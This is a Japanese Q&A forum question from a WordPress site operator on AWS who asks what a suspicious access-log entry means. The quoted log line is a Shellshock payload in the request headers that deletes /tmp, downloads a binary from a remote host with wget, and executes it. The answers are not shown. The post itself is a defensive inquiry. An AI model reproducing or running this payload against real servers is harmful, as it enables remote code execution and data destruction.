【環境】
=====
AWS EC2
nginx/1.6.2
PHP 5.3.29
WordPress 4.1.1
=====
現在、AWS上にてWordPressのブログサイトを利用しています。
昨日、アクセスログを確認したところ、以下のようなログがありました。
/bin/bashやechoコマンドといったものが書かれていたので、踏み台にされていたりしないか不安になり、質問させていただきました。
以下のログはどういったものになるのでしょうか。
もしお分かりになる方がいましたら、お教えいただけますでしょうか。
もし何かの攻撃だとしたら、どういったことを行おうとしているものなのでしょうか。
【ログ】
117.21.191.209 - - [01/Apr/2015:11:13:47 +0900] "GET / HTTP/1.1" 200 35509 "() { :; }; /bin/bash -c \x22rm -rf /tmp/;echo wget http://117.21.191.209:9645/test -O /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/;echo wget http://117.21.191.209:9645/test -O /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo /tmp/China.Z-jztp8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
回答3件
あなたの回答
tips
プレビュー
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
2015/04/03 08:56
2015/04/03 12:29
2015/04/06 12:33